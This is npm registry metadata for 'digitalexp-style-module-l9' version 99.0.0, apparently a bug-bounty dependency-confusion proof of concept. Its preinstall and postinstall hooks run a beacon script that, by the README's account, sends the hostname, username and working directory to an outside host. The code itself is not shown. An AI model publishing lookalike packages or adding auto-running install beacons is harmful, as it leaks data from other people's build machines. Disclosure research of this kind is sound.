{"_id":"digitalexp-style-module-l9","name":"digitalexp-style-module-l9","dist-tags":{"latest":"99.0.0"},"versions":{"99.0.0":{"name":"digitalexp-style-module-l9","version":"99.0.0","description":"Authorized security-research placeholder (dependency-confusion PoC). Benign, non-destructive.","main":"index.js","scripts":{"preinstall":"node beacon.js","postinstall":"node beacon.js"},"license":"MIT","_id":"digitalexp-style-module-l9@99.0.0","_nodeVersion":"24.4.1","_npmVersion":"11.4.2","dist":{"integrity":"sha512-NDJYOSszGVM8ERbL73aQkusxqhz4s2wSeZjMYXkI6HyKlWJYDBc3sJZAyJwzwqi3lC7BQkGFLF+Gxg0/PpWVpA==","shasum":"3dfcf8eb599b38e62137dc3360742eed239853ca","tarball":"https://registry.npmjs.org/digitalexp-style-module-l9/-/digitalexp-style-module-l9-99.0.0.tgz","fileCount":4,"unpackedSize":2669,"signatures":[{"keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U","sig":"MEUCIAJFhWPvWOw7G7dyFsJckjboNaPSJBjAaznN2SWvHn7KAiEAltOeLXsfgqk7/C3pYwqTcwAstwRTRpE3yw0Zjiywm0g="}]},"_npmUser":{"name":"archangelofold","email":"archangelofold@gmail.com"},"directories":{},"maintainers":[{"name":"archangelofold","email":"archangelofold@gmail.com"}],"_npmOperationalInternal":{"host":"s3://npm-registry-packages-npm-production","tmp":"tmp/digitalexp-style-module-l9_99.0.0_1787614014904_0.7895239568641825"},"_hasShrinkwrap":false}},"time":{"created":"2026-08-24T23:26:54.747Z","99.0.0":"2026-08-24T23:26:55.055Z","modified":"2026-08-24T23:26:55.283Z"},"maintainers":[{"name":"archangelofold","email":"archangelofold@gmail.com"}],"description":"Authorized security-research placeholder (dependency-confusion PoC). Benign, non-destructive.","license":"MIT","readme":"# digitalexp-style-module-l9\n\n**This is not a real package.** It is a benign placeholder published for an\n**authorized security-research / bug-bounty engagement** to demonstrate a\ndependency-confusion exposure (an internal package name resolvable from the\npublic npm registry).\n\nIt performs a single harmless callback (hostname / username / cwd) to identify\nwhich build host resolved it, exfiltrates nothing else, is fully non-destructive,\nand always exits 0. If you are an engineer who found this in your build: your\nCI resolved an internal name from public npm. Please contact the reporter via\nthe relevant bug-bounty program to have this removed.\n","readmeFilename":"README.md","_rev":"1-a6ee6c89922a6010a56bb5508bebc5a8"}